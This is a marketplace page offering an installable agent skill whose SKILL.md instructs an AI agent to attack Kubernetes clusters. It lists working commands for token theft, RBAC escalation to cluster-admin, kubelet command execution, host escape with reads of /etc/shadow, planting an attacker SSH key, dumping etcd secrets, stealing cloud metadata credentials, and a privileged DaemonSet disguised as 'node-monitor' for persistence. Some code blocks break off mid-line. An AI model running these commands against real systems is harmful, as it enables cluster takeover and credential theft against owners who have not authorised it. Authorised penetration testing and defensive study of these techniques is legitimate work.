Mmcp.market

offensive-k8s-attacks skill

by SnailSploit·SnailSploit/Claude-Red·7.0k stars·MIT

Kubernetes cluster attack techniques covering the full attack lifecycle from initial foothold in a pod to cluster-wide compromise. Covers service account token theft and impersonation, RBAC misconfiguration exploitation including wildcard permissions and privilege escalation via role binding, direct etcd access for secret extraction, kubelet API abuse on port 10250 and read-only port 10255, pod escape via hostPID hostNetwork and hostPath volume mounts, Kubernetes secrets enumeration and decoding, admission controller bypass techniques, network policy bypass and lateral movement, cloud metadata service access from pods for credential theft on AWS EKS GCP GKE and Azure AKS, CRD and operator abuse for persistence, and node compromise via DaemonSet deployment. Tools include kubectl, kube-hunter, peirates, kubeaudit, kdigger, kubeletctl. Maps to MITRE ATT&CK T1609 Container Administration Command, T1610 Deploy Container, T1613 Container and Resource Discovery. Use this skill when assessing Kubernetes clusters, attacking from within a compromised pod, exploiting RBAC or kubelet misconfigurations, or performing cloud-native lateral movement.

C67/100content scan

Is the offensive-k8s-attacks skill safe?

Read the findings before you install it. We read 1 file in the folder on 2026-09-28.

  • highSKILL.md:294

    Reads credential files (SSH keys, cloud or package-manager tokens) that a skill has no normal reason to touch.

    cat /proc/1/root/etc/shadow
  • lowSKILL.md:1

    The description is over 1,024 characters, the limit agents read.

    1152 characters

Install the offensive-k8s-attacks skill

A skill is a folder. Copy it into your agent's skills folder and the agent loads it when the task matches its description.

git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git /tmp/Claude-Red
mkdir -p ~/.claude/skills
cp -r /tmp/Claude-Red/Skills/container/offensive-k8s-attacks ~/.claude/skills/offensive-k8s-attacks
available in every project

In the Claude apps, zip the folder and upload it from the Skills settings. The folder on GitHub

The instructions your agent would load

SKILL.md as published, without the frontmatter. Read it on GitHub

Kubernetes Cluster Attacks

You have access to a Kubernetes environment, either through a compromised pod, stolen kubeconfig, or exposed API server. Your objective is to escalate privileges, move laterally, and compromise the cluster or underlying cloud infrastructure. Kubernetes security depends on RBAC policies, network policies, admission controllers, pod security standards, and cloud IAM integration. Each misconfiguration opens a path to deeper access. This skill covers systematic enumeration, privilege escalation, secret extraction, and cluster-wide compromise techniques.

Quick Workflow

  1. Determine your initial position: pod shell, stolen token, exposed API, or kubeconfig file.
  2. Enumerate service account permissions, cluster roles, and accessible resources.
  3. Identify escalation vectors: RBAC gaps, kubelet exposure, hostPath mounts, cloud metadata access.
  4. Escalate privileges by chaining misconfigurations or abusing overprivileged service accounts.
  5. Extract secrets, pivot to other namespaces, and target the control plane.
  6. Leverage cloud metadata or etcd access for infrastructure-wide compromise.

Phase 1: Initial Enumeration

Determining Your Position

# Check if you are inside a pod
ls /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null
cat /var/run/secrets/kubernetes.io/serviceaccount/token
cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Environment variables set by Kubernetes
env | grep -i kube
env | grep -i kubernetes

# Service host and port are injected into every pod
echo $KUBERNETES_SERVICE_HOST
echo $KUBERNETES_SERVICE_PORT

# DNS resolution for API server
nslookup kubernetes.default.svc.cluster.local

# Determine if kubectl is available
which kubectl 2>/dev/null
# If not, use curl with the service account token

Setting Up API Access Without kubectl

# Extract token and CA certificate
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}"

# Test API access
curl -s --cacert ${CACERT} -H "Authorization: Bearer ${TOKEN}" \
  ${APISERVER}/api/v1/namespaces

# Shorthand function for repeated use
k8s_api() {
  curl -s --cacert ${CACERT} -H "Authorization: Bearer ${TOKEN}" \
    "${APISERVER}$1"
}

# Check your identity
k8s_api "/apis/authentication.k8s.io/v1/tokenreviews" \
  -X POST -H "Content-Type: application/json" \
  -d "{\"apiVersion\":\"authentication.k8s.io/v1\",\"kind\":\"TokenReview\",\"spec\":{\"token\":\"${TOKEN}\"}}"

Automated Enumeration Tools

# kube-hunter - Kubernetes penetration testing tool
kube-hunter --active --remote $APISERVER

# peirates - Kubernetes penetration tool (run from within pod)
./peirates

# kubeaudit - Audit Kubernetes clusters for security concerns
kubeaudit all -f /path/to/kubeconfig

# kdigger - Kubernetes-focused container assessment
./kdigger dig all

# kubectl auth can-i - Check your permissions
kubectl auth can-i --list
kubectl auth can-i --list --namespace=kube-system
kubectl auth can-i create pods
kubectl auth can-i create pods/exec
kubectl auth can-i get secrets
kubectl auth can-i '*' '*'

Phase 2: Service Account Token Theft and Abuse

Discovering Tokens

# Default service account token mount
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Projected service account tokens (newer clusters)
ls /var/run/secrets/kubernetes.io/serviceaccount/
# Files: token, ca.crt, namespace

# Search for tokens in environment variables and config files
env | grep -i token
find / -name "kubeconfig" -o -name ".kube" -o -name "config" 2>/dev/null
find / -name "*.kubeconfig" 2>/dev/null

# Check mounted secrets in other pods (if you can list or exec)
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}/{.metadata.name}: {range .spec.volumes[*]}{.secret.secretName} {end}{"\n"}{end}'

# Look for tokens in etcd, configmaps, or environment variables
kubectl get secrets -A
kubectl get configmaps -A -o yaml | grep -i token

Token Impersonation

# Use a stolen token to authenticate
kubectl --token="$STOLEN_TOKEN" --server="$APISERVER" \
  --certificate-authority="$CACERT" auth can-i --list

# Impersonate a service account (requires impersonate verb)
kubectl auth can-i impersonate serviceaccounts
kubectl --as=system:serviceaccount:kube-system:default get secrets -n kube-system

# Impersonate a user
kubectl --as=admin@example.com get pods -A

# Impersonate a group
kubectl --as-group=system:masters --as=dummy get secrets -A

Phase 3: RBAC Misconfiguration Exploitation

Identifying Dangerous Permissions

# List all cluster roles and role bindings
kubectl get clusterroles -o json | python3 -c "
import json,sys
data=json.load(sys.stdin)
for role in data['items']:
    for rule in role.get('spec',{}).get('rules',[]):
        verbs=rule.get('verbs',[])
        resources=rule.get('resources',[])
        if '*' in verbs or '*' in resources:
            print(f\"DANGER: {role['metadata']['name']} - verbs:{verbs} resources:{resources}\")
"

# Check for wildcard permissions
kubectl get clusterrolebindings -o json | python3 -c "
import json,sys
data=json.load(sys.stdin)
for b in data['items']:
    subjects = b.get('subjects',[]) or []
    role = b.get('roleRef',{}).get('name','')
    for s in subjects:
        print(f\"{s.get('kind')}/{s.get('name')} -> {role}\")
"

# Find service accounts bound to cluster-admin
kubectl get clusterrolebindings -o json | \
  python3 -c "
import json,sys
data=json.load(sys.stdin)
for b in data['items']:
    if b.get('roleRef',{}).get('name')=='cluster-admin':
        for s in (b.get('subjects') or []):
            print(f\"cluster-admin: {s.get('kind')}/{s.get('namespace','')}/{s.get('name')}\")
"

Escalation via RBAC Gaps

# If you can create role bindings, bind yourself to cluster-admin
kubectl create clusterrolebinding pwn-binding \
  --clusterrole=cluster-admin \
  --serviceaccount=default:default

# If you can create roles, grant yourself wildcard access
cat <<'EOF' | kubectl apply -f -
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: pwn-role
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: pwn-role-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: pwn-role
subjects:
- kind: ServiceAccount
  name: default
  namespace: default
EOF

# If you can patch existing bindings
kubectl patch clusterrolebinding existing-binding -p \
  '{"subjects":[{"kind":"ServiceAccount","name":"default","namespace":"default"}]}'

# Escalate through escalate verb
# The "escalate" verb on roles/clusterroles allows granting permissions
# you do not have yourself
kubectl auth can-i escalate clusterroles

Phase 4: Kubelet API Exploitation

Accessing Kubelet Directly

# Kubelet API runs on port 10250 (authenticated) and 10255 (read-only, deprecated)
# Scan for kubelet ports across cluster nodes

# Read-only port (10255) - no auth required if exposed
curl -s http://NODE_IP:10255/pods | python3 -m json.tool
curl -s http://NODE_IP:10255/spec/
curl -s http://NODE_IP:10255/metrics

# Authenticated port (10250) - requires valid credentials
# Use service account token or client certificate
curl -sk https://NODE_IP:10250/pods \
  -H "Authorization: Bearer ${TOKEN}"

# List running pods on the node
curl -sk https://NODE_IP:10250/runningpods/ \
  -H "Authorization: Bearer ${TOKEN}"

Command Execution via Kubelet

# kubeletctl tool for kubelet API interaction
kubeletctl -s NODE_IP pods
kubeletctl -s NODE_IP scan rce

# Execute commands in pods via kubelet API directly (bypasses API server RBAC)
curl -sk https://NODE_IP:10250/run/NAMESPACE/POD_NAME/CONTAINER_NAME \
  -H "Authorization: Bearer ${TOKEN}" \
  -d "cmd=id"

# Execute in every container on the node
curl -sk https://NODE_IP:10250/runningpods/ \
  -H "Authorization: Bearer ${TOKEN}" | \
  python3 -c "
import json,sys
pods=json.load(sys.stdin)
for pod in pods.get('items',[]):
    ns=pod['metadata']['namespace']
    name=pod['metadata']['name']
    for c in pod['spec'].get('containers',[]):
        print(f'{ns}/{name}/{c[\"name\"]}')
"
# Then exec into each one to extract tokens and secrets

# Retrieve container logs
curl -sk "https://NODE_IP:10250/containerLogs/NAMESPACE/POD/CONTAINER" \
  -H "Authorization: Bearer ${TOKEN}"

Phase 5: Pod Escape via Privileged Configuration

hostPID Escape

# If the pod has hostPID: true, you see all host processes
ps aux  # Shows host processes

# Access host filesystem via /proc/1/root
ls -la /proc/1/root/
cat /proc/1/root/etc/shadow
cat /proc/1/root/etc/kubernetes/manifests/kube-apiserver.yaml

# nsenter into host namespaces
nsenter -t 1 -m -u -i -n -p -- bash

# Steal tokens from other pods' processes
for pid in $(ls /proc/ | grep -E '^[0-9]+$'); do
  token=$(cat /proc/$pid/environ 2>/dev/null | tr '\0' '\n' | grep -i kube)
  if [ -n "$token" ]; then
    cmdline=$(cat /proc/$pid/cmdline 2>/dev/null | tr '\0' ' ')
    echo "PID $pid ($cmdline): $token"
  fi
done

hostNetwork Escape

# If the pod has hostNetwork: true, you share the host's network namespace
ip addr show  # Shows host network interfaces

# Access services bound to localhost on the host
curl -s http://127.0.0.1:10255/pods  # Kubelet read-only
curl -sk https://127.0.0.1:10250/pods  # Kubelet API
curl -s http://127.0.0.1:2379/version  # etcd (if exposed)

# Access cloud metadata from host network perspective
curl -s http://169.254.169.254/latest/meta-data/  # AWS
curl -s -H "Metadata-Flavor: Google" http://169.254.169.254/computeMetadata/v1/  # GCP
curl -s -H "Metadata: true" "http://169.254.169.254/metadata/instance?api-version=2021-02-01"  # Azure

# Scan internal services
for port in 443 8443 6443 2379 10250 10255 30000-32767; do
  timeout 1 bash -c "echo >/dev/tcp/127.0.0.1/$port" 2>/dev/null && echo "Port $port open"
done

hostPath Volume Escape

# If the pod mounts a hostPath volume, you can read/write host files
# Common dangerous hostPath mounts:
# /               - full host filesystem
# /var/run        - container runtime sockets
# /etc            - host configuration
# /var/log        - host logs (may contain secrets)
# /root           - root home directory

# Check what is mounted
mount | grep -v overlay
cat /proc/1/mountinfo

# If / is mounted at /host
cat /host/etc/shadow
cat /host/etc/kubernetes/admin.conf
cat /host/root/.kube/config

# Write SSH key for host access
echo "ssh-rsa AAAA... attacker" >> /host/root/.ssh/authorized_keys

# Access Docker socket if mounted
ls -la /host/var/run/docker.sock

Deploying a Privileged Pod

# If you can create pods, deploy one with full host access
cat <<'EOF' | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: pwn-pod
  namespace: default
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: pwn
    image: alpine
    command: ["/bin/sh", "-c", "sleep 3600"]
    securityContext:
      privileged: true
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
      type: Directory
  tolerations:
  - operator: Exists
  nodeSelector:
    node-role.kubernetes.io/control-plane: ""
EOF

# Wait for pod to be ready, then exec in
kubectl exec -it pwn-pod -- nsenter -t 1 -m -u -i -n -p -- bash

Phase 6: Secrets Enumeration and Extraction

Kubernetes Secrets

# List all secrets across namespaces
kubectl get secrets -A

# Get specific secret content (base64 encoded)
kubectl get secret SECRET_NAME -n NAMESPACE -o json

# Decode all secrets in a namespace
kubectl get secrets -n NAMESPACE -o json | python3 -c "
import json,sys,base64
data=json.load(sys.stdin)
for secret in data['items']:
    name=secret['metadata']['name']
    print(f'=== {name} ===')
    for k,v in (secret.get('data') or {}).items():
        try:
            decoded=base64.b64decode(v).decode('utf-8','replace')
            print(f'  {k}: {decoded}')
        except:
            print(f'  {k}: [binary data]')
"

# Target high-value secrets
kubectl get secrets -A -o json | python3 -c "
import json,sys
data=json.load(sys.stdin)
for s in data['items']:
    name=s['metadata']['name']
    ns=s['metadata']['namespace']
    stype=s.get('type','')
    if any(x in name.lower() for x in ['admin','root','cloud','aws','gcp','azure','password','key','cert','token','db','database','api']):
        print(f'HIGH-VALUE: {ns}/{name} (type: {stype})')
"

etcd Direct Access

# etcd stores all Kubernetes state including secrets in plaintext (unless encrypted at rest)
# Default port: 2379 (client), 2380 (peer)

# Check if etcd is accessible
curl -s http://ETCD_IP:2379/version
curl -s http://127.0.0.1:2379/version  # From host network

# If etcd requires TLS, find certificates
# On control plane nodes, check:
ls -la /etc/kubernetes/pki/etcd/
# ca.crt, server.crt, server.key, peer.crt, peer.key

# Use etcdctl with certs
ETCDCTL_API=3 etcdctl \
  --endpoints=https://ETCD_IP:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get / --prefix --keys-only | head -50

# Dump all secrets from etcd
ETCDCTL_API=3 etcdctl \
  --endpoints=https://ETCD_IP:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix

# Extract specific secret
ETCDCTL_API=3 etcdctl \
  --endpoints=https://ETCD_IP:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/server.crt \
  --key=/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets

Phase 7: Cloud Metadata from Pods

AWS EKS

# Access Instance Metadata Service (IMDS) from pod
curl -s http://169.254.169.254/latest/meta-data/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/NODE_ROLE_NAME

# IMDSv2 (requires token)
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" \
  http://169.254.169.254/latest/meta-data/iam/security-credentials/

# EKS-specific: IRSA (IAM Roles for Service Accounts)
# Check for projected token and annotated service account
cat $AWS_WEB_IDENTITY_TOKEN_FILE
echo $AWS_ROLE_ARN

# Use AWS CLI with stolen role
aws sts assume-role-with-web-identity \
  --role-arn "$AWS_ROLE_ARN" \
  --role-session-name pwn \
  --web-identity-token "$(cat $AWS_WEB_IDENTITY_TOKEN_FILE)"

# Enumerate EKS cluster from stolen node credentials
aws eks describe-cluster --name CLUSTER_NAME
aws eks list-clusters

GCP GKE

# GCP metadata server
curl -s -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

curl -s -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes

# Get access token for GCP APIs
ACCESS_TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token | \
  python3 -c "import json,sys;print(json.load(sys.stdin)['access_token'])")

# Use token to access GCP APIs
curl -s -H "Authorization: Bearer $ACCESS_TOKEN" \
  "https://www.googleapis.com/compute/v1/projects/PROJECT_ID/zones/ZONE/instances"

# Workload Identity check
curl -s -H "Metadata-Flavor: Google" \
  http://169.254.169.254/computeMetadata/v1/instance/attributes/cluster-name

Azure AKS

# Azure Instance Metadata Service
curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/instance?api-version=2021-02-01"

# Get managed identity token
curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

# Use token for Azure Resource Manager
TOKEN=$(curl -s -H "Metadata: true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" | \
  python3 -c "import json,sys;print(json.load(sys.stdin)['access_token'])")

curl -s -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions?api-version=2020-01-01"

Phase 8: Admission Controller Bypass and Persistence

Bypassing Admission Controllers

# Check which admission controllers are active
kubectl get validatingwebhookconfigurations
kubectl get mutatingwebhookconfigurations

# Inspect webhook configuration for bypass opportunities
kubectl get validatingwebhookconfigurations -o json | python3 -c "
import json,sys
data=json.load(sys.stdin)
for wh in data['items']:
    name=wh['metadata']['name']
    for w in wh.get('webhooks',[]):
        ns_selector=w.get('namespaceSelector',{})
        obj_selector=w.get('objectSelector',{})
        failure=w.get('failurePolicy','Fail')
        print(f'{name}/{w[\"name\"]}: failurePolicy={failure}')
        if ns_selector:
            print(f'  namespaceSelector: {json.dumps(ns_selector)}')
        if failure == 'Ignore':
            print(f'  BYPASS: failurePolicy=Ignore - webhook failures are ignored')
"

# If failurePolicy is Ignore, you can create resources when webhook is down
# If namespaceSelector excludes certain namespaces, deploy there

# Deploy to kube-system (often excluded from admission policies)
kubectl run pwn --image=alpine -n kube-system -- sleep 3600

# Use static pods (bypass API server admission entirely)
# Write manifest to /etc/kubernetes/manifests/ on a node
cat >

CRD and Operator Abuse

# List custom resource definitions
kubectl get crds

# Check for operators with elevated privileges
kubectl get deployments -A -o json | python3 -c "
import json,sys
data=json.load(sys.stdin)
for d in data['items']:
    name=d['metadata']['name']
    ns=d['metadata']['namespace']
    sa=d['spec']['template']['spec'].get('serviceAccountName','default')
    if any(x in name.lower() for x in ['operator','controller','manager']):
        print(f'{ns}/{name} (SA: {sa})')
"

# If you can create CRDs, install a backdoor operator
# If you can modify existing CRs, inject malicious configurations
# Example: modify a CR that triggers pod creation with your image

Persistence via DaemonSet

# Deploy a DaemonSet that runs on every node
cat <<'EOF' | kubectl apply -f -
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: node-monitor
  namespace: kube-system
  labels:
    app: node-monitor
spec:
  selector:
    matchLabels:
      app: node-monitor
  template:
    metadata:
      labels:
        app: node-monitor
    spec:
      hostPID: true
      hostNetwork: true
      tolerations:
      - operator: Exists
      containers:
      - name: monitor
        image: alpine
        command: ["/bin/sh", "-c"]
        args:
        - |
          while true; do
            # Beacon to C2 or maintain reverse shell
            sleep 3600
          done
        securityContext:
          privileged: true
        volumeMounts:
        - name: host
          mountPath: /host
      vo

More skills from SnailSploit/Claude-Red

  • Aoffensive-active-directoryActive Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.
  • Aoffensive-advanced-redteamComprehensive red team operations methodology covering full engagement lifecycle from planning through reporting. Addresses engagement scoping and rules of engagement negotiation, multi-tier C2 infrastructure design with redirectors and domain fronting, malleable traffic profiles and beacon tradecraft, OPSEC discipline including attribution avoidance and indicator management, EDR and AMSI evasion techniques using direct syscalls and unhooking, data collection with chain-of-custody controls, and structured reporting with purple team debrief workflows. Covers assumed-breach, external-to-internal, insider threat, and hybrid physical-cyber engagement scenarios with MITRE ATT&CK mapping throughout. Targets operators planning or executing adversary simulation engagements against mature defenders.
  • Coffensive-ai-security
  • Aoffensive-anti-forensicsAnti-forensics and evidence destruction techniques for red team operators conducting authorized engagements. Covers log clearing on Windows (wevtutil, Clear-EventLog, ETW provider patching) and Linux (journal truncation, utmp/wtmp binary editing, syslog manipulation), timestamp manipulation via Timestomp and SetMACE to defeat timeline analysis, filesystem-level anti-forensics including NTFS Alternate Data Streams for payload hiding and secure deletion with sdelete/shred, memory artifact removal to counter live forensics, disk artifact manipulation targeting MFT entries and USN journal records, network forensics evasion through encrypted C2 channels and DNS-over-HTTPS tunneling, and anti-VM/sandbox detection to avoid dynamic analysis environments. Tools: Timestomp, wevtutil, sdelete, shred, MimiPenguin, Invoke-Phant0m. Aligns to MITRE ATT&CK T1070 (Indicator Removal), T1027 (Obfuscated Files or Information), T1497 (Virtualization/Sandbox Evasion). Each technique includes the forensic artifact it targets, the destruction or manipulation method, and the defender perspective so operators understand detection gaps they must account for.
  • Aoffensive-api-abuseAdvanced API exploitation methodology focused on business logic abuse and sophisticated attack patterns that bypass traditional security controls. Covers business logic bypass through API call chaining and workflow manipulation. Addresses GraphQL-specific attacks including batching for credential brute-force, query depth exploitation, and introspection abuse. Includes pagination exploitation for data exfiltration, webhook hijacking for SSRF and data interception, and resource exhaustion through algorithmic complexity attacks. Covers race conditions in API transactions using parallel request techniques. Provides comprehensive JWT manipulation including algorithm confusion, kid injection, jku/x5u abuse, and claim tampering. Details API key leakage detection across source repositories, client-side code, and error messages. Covers undocumented endpoint discovery through predictable naming, debug routes, and source map analysis. Tooling includes Arjun, ParamSpider, jwt_tool, and GraphQL Voyager. Designed for authorized penetration testers targeting business logic layers that automated scanners miss.
  • Aoffensive-api-securityComprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces. Addresses the full OWASP API Security Top 10 2023 including BOLA/IDOR, broken authentication, excessive data exposure, rate limiting bypass, BFLA, mass assignment, SSRF, and security misconfiguration. Includes REST-specific attacks such as HTTP verb tampering, content-type switching, and parameter pollution. Covers gRPC exploitation through protobuf interception, reflection API enumeration, and metadata injection. Addresses WebSocket vulnerabilities including origin bypass, message injection, and cross-site WebSocket hijacking. Provides tooling guidance for Burp Suite, Postman, grpcurl, websocat, and mitmproxy. Each technique includes detection signatures and defensive indicators so you understand what artifacts your testing leaves behind. Designed for authorized penetration testing engagements against API-driven architectures.
  • Aoffensive-bluetooth-bleBluetooth Low Energy (BLE) attack methodology — GATT enumeration, characteristic read/write without auth, pairing downgrade (Just Works forced), LE Secure Connections bypass, MITM via active relay, sniffing with Sniffle (TI CC1352) / Ubertooth / Frontline, encryption key extraction (LE Legacy Pairing crackable, LE Secure Connections strong), proximity authentication abuse (cars, locks), and companion-app trust analysis. Use for IoT BLE devices, smart locks, fitness trackers, medical devices, BLE beacons, or any device pairing over BLE.
  • Aoffensive-bluetooth-classicBluetooth Classic (BR/EDR) attack methodology — device discovery, service enumeration via SDP, LMP/L2CAP layer attacks, legacy PIN cracking (BlueBorne / KNOB), Bluetooth file-transfer abuse (BlueSnarfing legacy), unauthenticated profile abuse (HSP, HFP, OPP), and modern relevance against older industrial / automotive / accessory targets. Use when in-scope devices use Bluetooth Classic (Bluetooth ≤ 4.0 BR/EDR) — common in legacy car kits, industrial sensors, older medical devices, and audio accessories.
  • Aoffensive-bug-identification
  • Aoffensive-business-logicBusiness logic vulnerability testing for web/mobile/API engagements. Covers workflow bypass, state machine violations, multi-step process abuse, price/quantity/discount manipulation, currency confusion, coupon stacking, refund/chargeback abuse, race conditions on logic boundaries, parameter tampering for hidden flows, role/tenant boundary violations, time-of-check vs use, anti-automation defeat, fraud-detection evasion, and subscription/quota abuse. Use when scoping an application after surface-level OWASP Top 10 has been covered, or when the asset is a transactional/marketplace/fintech/e-commerce/SaaS app where logic flaws produce direct financial impact.
  • Aoffensive-c2-frameworksCommand and Control framework deployment, configuration, and operational tradecraft for red team engagements. Covers Cobalt Strike (malleable C2 profiles, Beacon types HTTP/HTTPS/DNS/SMB, Beacon Object Files for in-memory execution, sleep and jitter tuning, named pipe pivoting), Sliver (implant generation across mTLS/WireGuard/DNS transport, operator multiplayer mode, armory extensions), Mythic (agent ecosystem with Apollo/Poseidon/Medusa, C2 profile configuration, translation containers), Havoc (Demon agent with sleep obfuscation via Ekko/Zilean, indirect syscalls, dotnet inline execution), Metasploit (msfvenom payload generation, multi/handler staging, Meterpreter post-exploitation modules), redirector architecture using Apache mod_rewrite and Nginx, domain fronting through CDN providers, DNS-based C2 for restrictive network egress, and TLS certificate management for infrastructure OPSEC. Tools: Cobalt Strike, Sliver, Mythic, Havoc, Metasploit Framework. Aligns to MITRE ATT&CK T1071 (Application Layer Protocol), T1573 (Encrypted Channel), T1090 (Proxy/Connection Proxy).
  • Doffensive-cicd-pipelineComprehensive CI/CD pipeline exploitation methodology covering GitHub Actions injection vectors (expression injection via PR titles and issue bodies, workflow_run event abuse, GITHUB_TOKEN over-scoping, composite action supply chain compromise), Jenkins attack paths (Groovy sandbox escapes, script console remote code execution, Java remoting deserialization, credential store dumping, shared library injection), GitLab CI exploitation (YAML anchor injection, runner registration token abuse, CI variable extraction, protected branch bypass via merge request pipelines), and Azure DevOps pipeline agent compromise with service connection theft. Includes artifact poisoning techniques across all platforms, tooling guidance for gato and jenkins-attack-framework, and maps to MITRE ATT&CK T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain). Covers enumeration of pipeline configurations, privilege escalation from contributor to code execution, lateral movement through pipeline trust boundaries, and persistence via modified workflow definitions. Each technique section provides working exploitation code, detection indicators, and defensive countermeasures.

All agent skills → · MCP servers